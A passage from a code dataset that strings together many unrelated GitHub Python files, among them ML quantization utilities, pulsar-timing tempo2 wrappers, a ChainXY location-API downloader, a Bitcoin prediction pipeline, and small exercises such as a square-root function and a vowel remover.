logging\ndef prRed(prt): print(\"\\033[91m {}\\033[00m\" .format(prt))\ndef prGreen(prt): print(\"\\033[92m {}\\033[00m\" .format(prt))\ndef prYellow(prt): print(\"\\033[93m {}\\033[00m\" .format(prt))\ndef prLightPurple(prt): print(\"\\033[94m {}\\033[00m\" .format(prt))\ndef prPurple(prt): print(\"\\033[95m {}\\033[00m\" .format(prt))\ndef prCyan(prt): print(\"\\033[96m {}\\033[00m\" .format(prt))\ndef prLightGray(prt): print(\"\\033[97m {}\\033[00m\" .format(prt))\ndef prBlack(prt): print(\"\\033[98m {}\\033[00m\" .format(prt))\n\n\ndef cross_entropy_with_label_smoothing(pred, target, label_smoothing=0.1):\n logsoftmax = nn.LogSoftmax()\n n_classes = pred.size(1)\n # convert to one-hot\n target = torch.unsqueeze(target, 1)\n soft_target = torch.zeros_like(pred)\n soft_target.scatter_(1, target, 1)\n # label smoothing\n soft_target = soft_target * (1 - label_smoothing) + label_smoothing / n_classes\n return torch.mean(torch.sum(- soft_target * logsoftmax(pred), 1))\n \n\ndef wrapped_partial(func, *args, **kwargs):\n partial_func = functools.partial(func, *args, **kwargs)\n functools.update_wrapper(partial_func, func)\n return partial_func\n\n\ndef get_logger(file_path, name='ED'):\n \"\"\" Make python logger \"\"\"\n # [!] Since tensorboardX use default logger (e.g. logging.info()), we should use custom logger\n logger = logging.getLogger(name)\n coloredlogs.install(level='INFO', logger=logger)\n\n log_format = '%(asctime)s | %(message)s'\n formatter = logging.Formatter(log_format, datefmt='%m/%d %I:%M:%S %p')\n file_handler = logging.FileHandler(file_path)\n file_handler.setFormatter(formatter)\n\n logger.addHandler(file_handler)\n\n return logger\n\ndef print_params(config, prtf=print):\n prtf(\"\")\n prtf(\"Parameters:\")\n for attr, value in sorted(config.items()):\n prtf(\"{}={}\".format(attr.upper(), value))\n prtf(\"\")\n\n\ndef as_markdown(config):\n \"\"\" Return configs as markdown format \"\"\"\n text = \"|name|value| \\n|-|-| \\n\"\n for attr, value in sorted(config.items()):\n text += \"|{}|{}| \\n\".format(attr, value)\n\n return text\n\ndef at(x):\n return F.normalize(x.pow(2).mean(1).view(x.size(0), -1))\n\ndef at_loss(x, y):\n return (at(x) - at(y)).pow(2).mean()\n\n# def distillation(criterion,outputs, labels, teacher_outputs, params):\n# \"\"\"\n# Compute the knowledge-distillation (KD) loss given outputs, labels.\n# \"Hyperparameters\": temperature and alpha\n# NOTE: the KL Divergence for PyTorch comparing the softmaxs of teacher\n# and student expects the input tensor to be log probabilities! See Issue #2\n# \"\"\"\n# alpha = params.alpha\n# T = params.temperature\n# KD_loss = nn.KLDivLoss(reduction='mean')(torch.nn.functional.log_softmax(outputs/T, dim=1),\n# torch.nn.functional.softmax(teacher_outputs/T, dim=1)) * (alpha * T * T) +\\\n# criterion(outputs, labels) * (1. - alpha)\n# return KD_loss\n\ndef distillation(y, teacher_scores, labels, T, alpha):\n p = F.log_softmax(y/T, dim=1)\n q = F.softmax(teacher_scores/T, dim=1)\n l_kl = F.kl_div(p, q, reduction='sum') * (T**2) / y.shape[0]\n l_ce = F.cross_entropy(y, labels)\n return l_kl * alpha + l_ce * (1. - alpha)\n\n\ndef pix_loss(x,y):\n loss = torch.mean(torch.mean(torch.abs(x-y), dim = (1,2,3)))\n return loss\n \n####################\n# image convert\n####################\n\ndef _make_dir(path):\n if not os.path.exists(path): os.makedirs(path)\n\ndef tensor2img(tensor, out_type=np.uint8, min_max=(0, 1)):\n '''\n Converts a torch Tensor into an image Numpy array\n Input: 4D(B,(3/1),H,W), 3D(C,H,W), or 2D(H,W), any range, RGB channel order\n Output: 3D(H,W,C) or 2D(H,W), [0,255], np.uint8 (default)\n '''\n tensor = tensor.squeeze().float().cpu().clamp_(*min_max) # clamp\n tensor = (tensor - min_max[0]) / (min_max[1] - min_max[0]) # to range [0,1]\n n_dim = tensor.dim()\n if n_dim == 4:\n n_img = len(tensor)\n img_np = make_grid(tensor, nrow=int(math.sqrt(n_img)), normalize=False).numpy()\n img_np = np.transpose(img_np[[2, 1, 0], :, :], (1, 2, 0)) # HWC, BGR\n elif n_dim == 3:\n img_np = tensor.numpy()\n img_np = np.transpose(img_np[[2, 1, 0], :, :], (1, 2, 0)) # HWC, BGR\n elif n_dim == 2:\n img_np = tensor.numpy()\n else:\n raise TypeError(\n 'Only support 4D, 3D and 2D tensor. But received with dimension: {:d}'.format(n_dim))\n if out_type == np.uint8:\n img_np = (img_np * 255.0).round()\n # Important. Unlike matlab, numpy.unit8() WILL NOT round by default.\n return img_np.astype(out_type)\n\n\ndef save_img(img, img_path, mode='RGB'):\n cv2.imwrite(img_path, img)\n\n\ndef get_activation(name,activation):\n def hook(model, input, output):\n activation[name] = output\n return hook\n\ndef plot_loss(args,loss,apath,epoch):\n axis = np.linspace(1, epoch, epoch)\n for i, l in enumerate(loss):\n label = '{} Loss'.format(l['type'])\n fig = plt.figure()\n plt.title(label)\n plt.plot(axis, log[:, i].numpy(), label=label)\n plt.legend()\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.grid(True)\n plt.savefig(os.path.join(apath, 'loss_{}.pdf'.format(l['type'])))\n plt.close(fig)\n\ndef plot_psnr(args,apath,epoch,log):\n \n axis = np.linspace(1, epoch, epoch)\n for idx_data, d in enumerate(args.data_test):\n label = 'SR on {}'.format(d)\n fig = plt.figure()\n plt.title(label)\n for idx_scale, scale in enumerate(args.scale):\n plt.plot(\n axis,\n log[:, idx_data, idx_scale].numpy(),\n label='Scale {}'.format(scale)\n )\n plt.legend()\n plt.xlabel('Epochs')\n plt.ylabel('PSNR')\n plt.grid(True)\n plt.savefig(os.path.join(apath, 'test_{}_{}.png'.format(d, args.save)))\n plt.close(fig)\n\ndef plot_bit(args,apath,epoch,log):\n \n axis = np.linspace(1, epoch, epoch)\n for idx_data, d in enumerate(args.data_test):\n label = 'SR on {}'.format(d)\n fig = plt.figure()\n plt.title(label)\n for idx_scale, scale in enumerate(args.scale):\n plt.plot(\n axis,\n log[:, idx_data, idx_scale].numpy(),\n label='Scale {}'.format(scale)\n )\n plt.legend()\n plt.xlabel('Epochs')\n plt.ylabel('Avg Bit')\n plt.grid(True)\n plt.savefig(os.path.join(apath, 'test_{}_bit_{}.png'.format(d, args.save)))\n plt.close(fig)\n\ndef save_checkpoint(state, is_best, checkpoint='checkpoint', filename='checkpoint.pth.tar', lpips=False):\n filepath = os.path.join(checkpoint, filename)\n torch.save(state, filepath)\n if is_best:\n if lpips:\n shutil.copyfile(filepath, os.path.join(checkpoint, 'model_best_lpips.pth.tar'))\n else:\n shutil.copyfile(filepath, os.path.join(checkpoint, 'model_best.pth.tar'))\n else:\n shutil.copyfile(filepath, os.path.join(checkpoint, 'model_latest.pth.tar'))\n\n\ndef laplacian(image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n laplac = cv2.Laplacian(gray, cv2.CV_16S, ksize=3)\n mask_img = cv2.convertScaleAbs(laplac)\n return mask_img\n\ndef tensor2img(tensor, out_type=np.uint8, min_max=(0, 1)):\n '''\n Converts a torch Tensor into an image Numpy array\n Input: 4D(B,(3/1),H,W), 3D(C,H,W), or 2D(H,W), any range, RGB channel order\n Output: 3D(H,W,C) or 2D(H,W), [0,255], np.uint8 (default)\n '''\n tensor = tensor.squeeze().float().cpu().clamp_(*min_max) # clamp\n tensor = (tensor - min_max[0]) / (min_max[1] - min_max[0]) # to range [0,1]\n n_dim = tensor.dim()\n if n_dim == 4:\n n_img = len(tensor)\n img_np = make_grid(tensor, nrow=int(math.sqrt(n_img)), normalize=False).numpy()\n img_np = np.transpose(img_np[[2, 1, 0], :, :], (1, 2, 0)) # HWC, BGR\n elif n_dim == 3:\n img_np = tensor.numpy()\n img_np = np.transpose(img_np[[2, 1, 0], :, :], (1, 2, 0)) # HWC, BGR\n elif n_dim == 2:\n img_np = tensor.numpy()\n else:\n raise TypeError('Only support 4D, 3D and 2D tensor. But received with dimension: {:d}'.format(n_dim))\n if out_type == np.uint8:\n img_np = (img_np * 255.0).round()\n # Important. Unlike matlab, numpy.unit8() WILL NOT round by default.\n return img_np.astype(out_type)\n\n\n\ndef set_bit_config(model, bit_config):\n for n, m in model.named_modules():\n if isinstance(m, quant_act_pams):\n plist = n.split('.')\n block_index = int(plist[1])\n quant_index = int(plist[2][-1])\n # print(f'bindex:{block_index} qindex:{quant_index}')\n if quant_index != 3:\n setattr(m, 'k_bits', bit_config[block_index*2 + quant_index - 1])\n\ndef set_bit_flag(model, flag):\n # flag -> batch_size bit_width\n total_index = 0\n for n, m in model.named_modules():\n if isinstance(m, BitSelector):\n cur_list = []\n for i in range(len(flag)):\n cur_list.append(flag[i][total_index])\n setattr(m, 'flag', torch.tensor(cur_list, dtype=torch.int32))\n total_index += 1\n \ndef get_bit_config(model):\n bit_list = []\n flag=0\n for n, m in model.named_modules():\n flag=0\n if isinstance(m, BitSelector_org):\n if int(getattr(m, 'bits_out')) == args.search_space[2]:\n flag = 2\n elif int(getattr(m, 'bits_out')) == args.search_space[1]:\n flag = 1\n else:\n flag = 0 \n bit_list.append(flag)\n return bit_list\n\n\ndef random_pick(some_list, probabilities): \n x = random.uniform(0,1) \n cumulative_probability = 0.0 \n for item, item_probability in zip(some_list, probabilities): \n cumulative_probability += item_probability \n if x < cumulative_probability:\n break \n return item\n","repo_name":"Sheldon04/CABM-pytorch","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":14357,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"99"} +{"seq_id":"43521908088","text":"def main():\n tol = 1/1000\n res = multiply(tol)\n print(\"Produkt: {0}\\nIterasjoner: {1}\\nToleranse: {2}\".format(res[0],res[1],tol))\n \ndef multiply(tol):\n product = 1\n i = 1\n while(True):\n productold = product\n n = 1 + 1/i**2\n product *= n\n i+=1\n if((product - productold) < tol):\n break\n return product,i\nmain()","repo_name":"Hrkrabbe/Python","sub_path":"Øving 5/multiplikasjon.py","file_name":"multiplikasjon.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39227500631","text":"import sys\nimport math\n\n\ndef sqrt(number):\n \"\"\"\n Calculate the floored square root of a number\n This is a divide and conquer algorithm\n\n Args:\n number(int): Number to find the floored squared root\n Returns:\n int: Floored Square Root\n \"\"\"\n\n if number is None or not isinstance(number, int):\n return None\n\n # Square root of absolute values 1 and 0 are the same as the original values\n if abs(number) == 1 or abs(number) == 0:\n return number\n\n negligible_approximation = 0.01\n\n mid = number/2\n\n lower_bound = 0\n upper_bound = number\n\n while abs(mid**2 - number) >= negligible_approximation:\n\n # determine which bound our mid value is close to\n if mid**2 < number:\n lower_bound = mid\n else:\n upper_bound = mid\n\n # combine upper and lower bound and divide them by half to repeat the cycle\n mid = (lower_bound + upper_bound)/2\n\n # get the rounded value of the mid\n return math.floor(mid)\n","repo_name":"george-marcus/problems-vs-algorithms","sub_path":"Finding Square Root of an Integer/sqrt.py","file_name":"sqrt.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28563358732","text":"# tempo2_utils.py\n\n# Simple python functions to help gather results from tempo2\n\nimport os\nimport numpy\nimport subprocess\nimport tempfile\n\n_nobs = 30000\n\ndef general2(parfile, timfile, params):\n \"\"\"\n general2(parfile, timfile, params):\n\n Calls tempo2 with the general2 plugin, and reads the output.\n\n Inputs:\n parfile = string, name of parfile\n timfile = string, name of tim file\n params = list of general2 values to return\n\n Outputs:\n dict of numpy arrays for each requested param.\n\n Notes:\n Assumes each parameter results in a single text column in the general2\n output. A few params (for example 'posPulsar') output multiple columns,\n using these will currently break things.\n\n Also currently assumes all outputs can be interpreted as floating\n point numbers.\n \"\"\"\n\n id_str = 'ABCD'\n s_arg = id_str\n for p in params:\n s_arg += \" {%s}\" % p\n s_arg += \"\\\\n\"\n\n t2output = subprocess.check_output([\"tempo2\", \"-nobs\", \"%d\"%_nobs, \n \"-output\", \"general2\", \n \"-f\", parfile, timfile, \n \"-s\", s_arg])\n\n goodlines = [x for x in t2output.decode(\"utf8\").split('\\n') if x.startswith(id_str)]\n nline = len(goodlines)\n\n result = {}\n for p in params:\n # Note, assumes single output column per requested param\n # and that all values are numerical\n result[p] = numpy.zeros(nline)\n\n for i in range(nline):\n vals = goodlines[i].split()\n for ip in range(len(params)):\n result[params[ip]][i] = vals[ip+1]\n\n return result\n\ndef chi2(parfile,timfile):\n \"\"\"\n Run tempo2, get chi2 (as reported by 'general' plugin)\n \"\"\"\n\n id_str = 'ABCD'\n t2output = subprocess.check_output([\"tempo2\", \"-nobs\", \"%d\"%_nobs, \"-output\", \"general\",\n \"-s\", id_str+' ', \"-f\", parfile, timfile])\n\n goodlines = [x for x in t2output.split('\\n') if x.startswith(id_str)]\n\n chi2 = 0.0\n for l in goodlines:\n vals = l.split()\n if vals[1]=='chisq' and vals[2]=='=':\n chi2 = float(vals[3])\n\n return chi2\n\ndef stats(parfile,timfile):\n \"\"\"\n Run tempo2, get chi2, ndof, rms (as reported by 'general' plugin)\n \"\"\"\n\n id_str = 'ABCD'\n t2output = subprocess.check_output([\"tempo2\", \"-nobs\", \"%d\"%_nobs, \"-output\", \"general\",\n \"-s\", id_str+' ', \"-f\", parfile, timfile])\n\n goodlines = [x for x in t2output.split('\\n') if x.startswith(id_str)]\n\n chi2 = 0.0\n for l in goodlines:\n vals = l.split()\n if vals[1]=='chisq' and vals[2]=='=':\n chi2 = float(vals[3])\n\n return chi2\n\ndef newpar(parfile,timfile):\n \"\"\"\n Run tempo2, return new parfile (as list of lines). input parfile\n can be either lines or a filename.\n \"\"\"\n orig_dir = os.getcwd()\n try:\n temp_dir = tempfile.mkdtemp(prefix=\"tempo2\")\n try:\n lines = open(parfile,'r').readlines()\n except:\n lines = parfile\n open(\"%s/pulsar.par\" % temp_dir, 'w').writelines(lines)\n timpath = os.path.abspath(timfile)\n os.chdir(temp_dir)\n cmd = \"tempo2 -nobs %d -newpar -f pulsar.par %s\" % (_nobs, timpath)\n os.system(cmd + \" > /dev/null\")\n outparlines = open('new.par').readlines()\n finally:\n os.chdir(orig_dir)\n os.system(\"rm -rf %s\" % temp_dir)\n for l in outparlines:\n if l.startswith('TRES'): rms = float(l.split()[1])\n elif l.startswith('CHI2R'): (foo, chi2r, ndof) = l.split()\n return float(chi2r)*float(ndof), int(ndof), rms, outparlines\n\n\n\n","repo_name":"demorest/tempo_utils","sub_path":"tempo2_utils.py","file_name":"tempo2_utils.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"27436361720","text":"import ADC0832\r\nimport time\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\ndef init():\r\n\tADC0832.setup()\r\ndef loop():\r\n\tn=0\r\n\ti=0\r\n\ty=[]\r\n\tx=[]\r\n\tt=time.process_time() \r\n\r\n\twhile n<10:\r\n\t\tdigitalVal=ADC0832.getResult()\r\n\t\ty.append(3.3*float(digitalVal)/255)\r\n\t\tx.append(time.process_time()) \r\n\t\tn=n+1\r\n\t#plt.axis([0.1,0.2,0.4,0.8])\r\n\t#前后两组参数分别表示x、y轴范围\r\n\t#等价于plt.xlim(0.1,0.2) plt.ylim(0.4,0.8)\r\n\tplt.plot(x,y,'-o')\r\n\twhile i<10:\r\n\t\tx1=\"%.3f\"%x[i]\r\n\t\ty1=\"%.2f\"%y[i]\r\n\t\ttext='{'+str(x1)+','+str(y1)+'}'\r\n\t\tplt.text(x[i],y[i],text)\r\n\t\ti=i+1\r\n\tplt.show()\r\nif __name__=='__main__':\r\n\tinit()\r\n\tloop()\r\n\tADC0832.destroy()\r\n\tprint(\"The End\")\r\n\t\r\n\t","repo_name":"Outsider565/Intro_to_electronic_system","sub_path":"lec3/measure_plt.py","file_name":"measure_plt.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"20038326406","text":"# AUTHOR: Andy Nguyen\n# FIXED BY: Andy Nguyen 09/21/22\n# FIX: Add main controller, new functions\n# This script sample allows you to download all scrape updates for individual chains and prints out a url in console\nimport requests\nimport json\nimport time\n\n# This is used for api calls with headers set in each function along with the api key being passed from main\ndef check_api_key(cxy_api_key):\n \n url = 'https://location.chainxy.com/api/Users/Me'\n headers = {'x-apikey': cxy_api_key,\n 'x-Application': 'Python API Call',\n 'content-type': 'application/json'}\n response = requests.get(url, headers=headers)\n if response.status_code == 401:\n raise ValueError(\"Bad ChainXY API key provided, double-check the provided value!\")\n\ndef generate_updates_list(cxy_api_key:str, chain_id:int):\n \"\"\"\n Returns a record list of chainxy scrape updates based on the provided chain_id from the main controller\n Params: Used to query out chain_id from api-caller\n cxy_api_key:str - ChainXY API Key\n chains_id:int - ID of the chain for which all the update ids will be returned.\n \"\"\"\n \n check_api_key(cxy_api_key)\n \n headers = {'x-apikey': cxy_api_key,\n 'x-Application': 'Python API Call',\n 'content-type': 'application/json'}\n \n apiUrl = \"https://location.chainxy.com/api/ChainScrapes\"\n \n params = {\n \"fields\": \"Id,RunDate\",\n \"Query\": str({\"ChainId\":chain_id}),\n \"Limit\": \"100\"\n }\n\n # Gets the data from the page and loads params and headers\n r = requests.get(url=apiUrl, params=params, headers=headers)\n r_body = json.loads(r.text)\n\n return r_body['Records']\n\ndef generate_downloads(cxy_api_key:str, scrape_update_list:list):\n \"\"\"\n Posts downloads on the CXY platform and prints out in console the list of scrapeids and the urls \n Params:\n cxy_api_key:str - ChainXY API Key\n scrape_update_list:list - Calls the returned list of Scapes from generate_updates_list\n \"\"\"\n \n check_api_key(cxy_api_key)\n \n headers = {'x-apikey': cxy_api_key,\n 'x-Application': 'Python API Call',\n 'content-type': 'application/json'}\n\n url_params = {\n \"format\": \"CSV\", # ZIP_CSV Also works\n \"splitLayers\": \"false\",\n # \"dataDate\": \"2019-10-03\" # OPTIONAL\n }\n\n data = {}\n createdScrapeFileURLs = []\n api_download_url = \"https://location.chainxy.com/api/ChainScrapes/Download/\"\n \n\n # Loops untill the end of the scape ids list and executes the post and get api calls as well as printing/returning the url to the console.\n for item in scrape_update_list:\n\n # Posts and creates the links on the platform here\n response = requests.post(url=api_download_url + str(item['Id']), data=json.dumps(data), params=url_params, headers=headers)\n r_body = json.loads(response.text)\n\n #Uses the \"Id\" in r_body for get request for the url link in order to print onto the console\n scrape_download_id = r_body['Id']\n print(\"Run Date: \" + str(item['RunDate']))\n fileGenerated = False\n createdScrapeFileURL = False\n \n # While Loop checks for status downloads for each step of the way and will pause for 5 seconds while it is downloading.\n while(fileGenerated == False):\n print(\"Checking for status of generated file, Download Id: \" + str(scrape_download_id) + \"...\")\n response = requests.get(url='https://location.chainxy.com/api/Downloads/{}'.format(scrape_download_id), headers=headers)\n r_body = json.loads(response.text)['Record']\n\n if r_body['Status'] == 0:\n print(\"Download Scrape ID: \" + str(item['Id']) + \" is still being generated\")\n time.sleep(5)\n\n elif r_body['Status'] == 2:\n print(\"File generation failed. Speak to ChainXY for assistance\")\n fileGenerated = True\n\n elif r_body['Status'] == 1:\n print(\"File generation completed!\")\n fileGenerated = True\n createdScrapeFileURL = r_body['Link']\n createdScrapeFileURLs.append(r_body['Link']) \n print('Download Link Here: {}'.format(createdScrapeFileURL))\n print('----------------------------------------------------------------') \n \n return createdScrapeFileURLs\n\ndef main():\n \"\"\"\n this function is used as a controller to pass the variables through the other functions and executes them\n cxy_api_key:str - Insert the generate ChainXY API Key to allow for api calls to the platform.\n chain_id:list - Choose which chain_id to pull scraping updates from.\n \"\"\"\n\n cxy_api_key = ''\n chain_id = 0 \n \n # Calls variables and Executes Functions here\n updates_record_list = generate_updates_list(cxy_api_key, chain_id)\n scrape_download_urls = generate_downloads(cxy_api_key, updates_record_list)\n\n\nif __name__ == '__main__':\n main()","repo_name":"ChainXY/ChainXY_API","sub_path":"python/DownloadAllUpdatesForChain.py","file_name":"DownloadAllUpdatesForChain.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"17893877276","text":"import sys\n\nday = int(sys.argv[1])\n\nout = ''.join([l for l in open('template.py', 'r')]) % (day, day)\n\nwith open('%d.py' % day, 'w') as f:\n f.write(out)\n\n\n","repo_name":"colton-p/aoc","sub_path":"old/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42961078016","text":"# Prompt the user to enter a word and assign to variable\nuserWord = input(\"Please enter a word: \")\n# Make the word uppercase\nuserWord = userWord.upper()\nnonvowels = []\nprint(userWord)\n\n# Loop over the letters in the word\n# Do not print vowels\n# Add consonants to a list\n# Print list of consonants\nfor letter in userWord:\n vowels = ['A','E','I','O','U']\n if letter in vowels:\n continue\n nonvowels.append(letter)\nprint(' '.join(nonvowels))","repo_name":"Deanna2000/PythonPractice","sub_path":"eating_vowels.py","file_name":"eating_vowels.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"43558075141","text":"import sys\nimport os\nfrom src.Exception import customException\nfrom src.logger import logging\nfrom src.utils import load_object\nimport pandas as pd\n\n\nclass PredictPipeline:\n def __init__(self):\n pass\n\n def predict(self,features):\n try:\n preprocessor_path=os.path.join('artifact','preprocessor.pkl')\n model_path=os.path.join('artifact','model.pkl')\n\n preprocessor=load_object(preprocessor_path)\n model=load_object(model_path)\n\n data_scaled=preprocessor.transform(features)\n\n pred=model.predict(data_scaled)\n return pred\n \n\n except Exception as e:\n logging.info(\"Exception occured in prediction\")\n raise customException(e,sys)\n \nclass CustomData:\n def __init__(self,\n Open:float,\n High:float,\n Low:float,\n Close:float,\n Volume:float,\n Market_Cap:float\n ):\n \n self.Open=Open\n self.High=High\n self.Low=Low\n self.Close=Close\t\n self.Volume=Volume\n self.Market_Cap=Market_Cap\n \n \n\n def get_data_as_dataframe(self):\n try:\n custom_data_input_dict = {\n 'Open':[self.Open],\n 'High':[self.High],\n 'Low':[self.Low],\n 'Close':[self.Close],\n 'Volume':[self.Volume],\n 'Market_Cap':[self.Market_Cap]\n \n }\n df = pd.DataFrame(custom_data_input_dict)\n logging.info('Dataframe Gathered')\n return df\n except Exception as e:\n logging.info('Exception Occured in prediction pipeline')\n raise customException(e,sys)\n","repo_name":"Shreyashchawda12/Bitcoin_prediction","sub_path":"src/pipeline/predict_pipeline.py","file_name":"predict_pipeline.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25784368197","text":"import requests\nfrom lxml import etree\nimport json\n\n\nclass BtcSpider(object):\n def __init__(self):\n self.base_url = 'http://8btc.com/forum-61-'\n self.headers = {\n \"Cookie\": \"eCM1_5408_saltkey=rh53aKPV; eCM1_5408_lastvisit=1542615216; eCM1_5408_smile=2D1; UM_distinctid=1672b3ef6744a-064cc079dc7509-47e1039-144000-1672b3ef67516b; eCM1_5408_visitedfid=61D2D42D147D186D41D187; yd_cookie=cb4d61fc-df80-42f1a88b088312ae639a249701db97914f44; _ydclearance=348067b0f373f61ca38face9-5cad-429a-8449-7c4778ecee5f-1544892512; eCM1_5408_atarget=1; PHPSESSID=d6arrqnharnm6n1m7ipc2r3cr1; CNZZDATA5934912=cnzz_eid%3D1642669416-1542616124-http%253A%252F%252F8btc.com%252F%26ntime%3D1544883164; eCM1_5408_sid=eO5466; eCM1_5408_forum_lastvisit=D_61_1544886342; eCM1_5408_sendmail=1; _fmdata=tm5J8v6x5IsfhLn%2FJX0eqRLZvUsbF885abDrpjp7Xs5hzHOWR3SOwvVcf8c7ZjKz0w19NZMmzhe54w8%2BX2LALy%2FjZhH%2BTPn0IrDIsCIcCRg%3D; eCM1_5408_lastact=1544886374%09forum.php%09ajax; QINGCLOUDELB=357aa5de761afb88fff0143d75a28ce9df8df81e67e223b1ddcf15080c9f3df6|XBUYa|XBUWL\",\n \"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n }\n\n self.data_list = []\n\n # 1.发请求\n def get_response(self, url):\n response = requests.get(url, headers=self.headers)\n # 网页的 编码到底 是 gbk 还是 urf-8 head--meta-charset=\"\"\n # \n data = response.content.decode('gbk')\n # data = response.content\n\n # with open('05btc.html', 'w') as f:\n # f.write(data)\n return data\n\n # 2.解析数据\n def parse_data(self, data):\n # 使用xpath 解析当前页面 所有的 新闻title 和url 保存\n # 1.转类型\n x_data = etree.HTML(data)\n\n # 2.根据xpath路径解析\n # 路径 mark 观察发现 有个独特的class\n #title_list = x_data.xpath('//a[@class=\"s xst\"]/text()')\n title_list = x_data.xpath('/html[1]/body[1]/div[6]/div[2]/div[1]/div[1]/div[3]/div[2]/div[2]/form[1]/div/div[2]/div[1]/a[2]/text()')\n #title_list = x_data.xpath('//div[contain(@id,\"normalthread_\")]/div[2]/div/a[1]/text()')\n\n # title_list = x_data.xpath('//form[@id=\"moderate\"]/div/div[2]/div/a[@class=\"s xst\"]/text()')\n url_list = x_data.xpath('//a[@class=\"s xst\"]/@href')\n\n # mark 处理数据格式\n for index, title in enumerate(title_list):\n news = {}\n # print(index)\n # print(title)\n news['name'] = title\n news['url'] = url_list[index]\n self.data_list.append(news)\n\n # 3.保存数据\n def save_data(self):\n\n # 将 list---str\n data_str = json.dumps(self.data_list)\n # 这样出来看到\\u5f88 这样是正常的 去https://www.bejson.com/ 校验 就能看到中文了\n with open('05btc.json', 'w',encoding='gbk') as f:\n f.write(data_str)\n\n # 4.启动\n def run(self):\n\n for i in range(1, 5):\n # 1.拼接 完整url\n url = self.base_url + str(i) + '.html'\n print(url)\n # 2.发请求\n data = self.get_response(url)\n\n # 3.做解析\n self.parse_data(data)\n # 4.保存\n self.save_data()\n\n\nBtcSpider().run()\n","repo_name":"hiei17/Crawler_Learning_Record","sub_path":"xpath/6.05-抓btc标题列表为例.py","file_name":"6.05-抓btc标题列表为例.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"2597428956","text":"from keras.models import load_model\nfrom keras.preprocessing import image\nimport numpy as np\nmodel = load_model('bird-model.h5')\n\nimg_name = './data/train/not_bird/Indigo_Bunting_0001_12469.jpg'\n\n# Load a single image into x\nwidth, height = 64, 64\nimg = image.load_img(img_name, target_size=(width, height))\nimg *= 255.0/np.array(img).max()\nx = image.img_to_array(img)\nx = np.expand_dims(x, axis=0)\n\n# create an array with a single image\nimages = np.vstack([x])\n\n# Test the class that the model is predicting\nclasses = model.predict_classes(images, batch_size=10)\nprint(classes)","repo_name":"ravelantunes/bird-classifier-model","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39358135100","text":"import sys\nsys.path.insert(1, 'C:/Users/nicho/Documents/GitHub/SimplexSIS')\n\nimport simplexTheory\nimport simplexVisualize\nimport simplexContagion\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom simplexTheory import *\nimport math\n\ngamma = 2\nisDegreeCorrelated = True\ntype = \"power-law\"\nminDegree = 50\nmaxDegree = 450\nexponent = 4.0\ndigits = 4\ntolerance = 0.0001\ndegreeHist = generateTheoreticalDegreeHist(minDegree, maxDegree, type, exponent=exponent)\nmeanDegree = computeMeanPowerOfDegreeFromHist(degreeHist, 1)\nmeanSquaredDegree = computeMeanPowerOfDegreeFromHist(degreeHist, 2)\nmeanSimplexDegree = meanDegree\n\nminAlpha = 0\nmaxAlpha = 0.06\nbetaCrit = meanDegree/meanSquaredDegree*gamma\nminBeta = 0.5*betaCrit\nmaxBeta = 1.5*betaCrit\n\nnumBetaPoints = 50\n\n#alphaCrit = calculateTheoreticalCriticalAlpha(gamma, betaCrit, minAlpha, maxAlpha, degreeHist, meanSimplexDegree=meanSimplexDegree, isDegreeCorrelated=isDegreeCorrelated, digits=digits, tolerance=tolerance)\nalphaCrit = 0.1\nalphaCritFraction = [1.0]\n\nbeta = np.linspace(minBeta, maxBeta, numBetaPoints)\nsimplexVisualize.plotTheoreticalInfectionCurves(gamma, beta, alphaCritFraction, alphaCrit, degreeHist, meanSimplexDegree=meanSimplexDegree, isDegreeCorrelated=isDegreeCorrelated, digits=digits)\n","repo_name":"nwlandry/SimplexSIS","sub_path":"_OBSOLETE/plotTheoryInfectionCurves.py","file_name":"plotTheoryInfectionCurves.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"36348614210","text":"\r\nimport sys\r\nimport os.path\r\nsys.path.append(\r\n os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\r\n\r\nimport calculator.calc_lib as calc\r\n\r\n\r\ndef stDev(file):\r\n \"\"\"\r\n **Stadandard Deviation:**\r\n Calculates the standard deviation of numbers input through stdin.\r\n\r\n :param file: stdin input\r\n\r\n :type file: string\r\n \r\n :return: Value of the standard deviation \r\n\r\n \"\"\"\r\n total = 0\r\n totalSquared = 0\r\n numbers = []\r\n for line in file:\r\n numbers.append(line.rstrip())\r\n N = len(numbers)\r\n\r\n for number in numbers:\r\n total = calc.Addition(total,float(number))\r\n totalSquared = 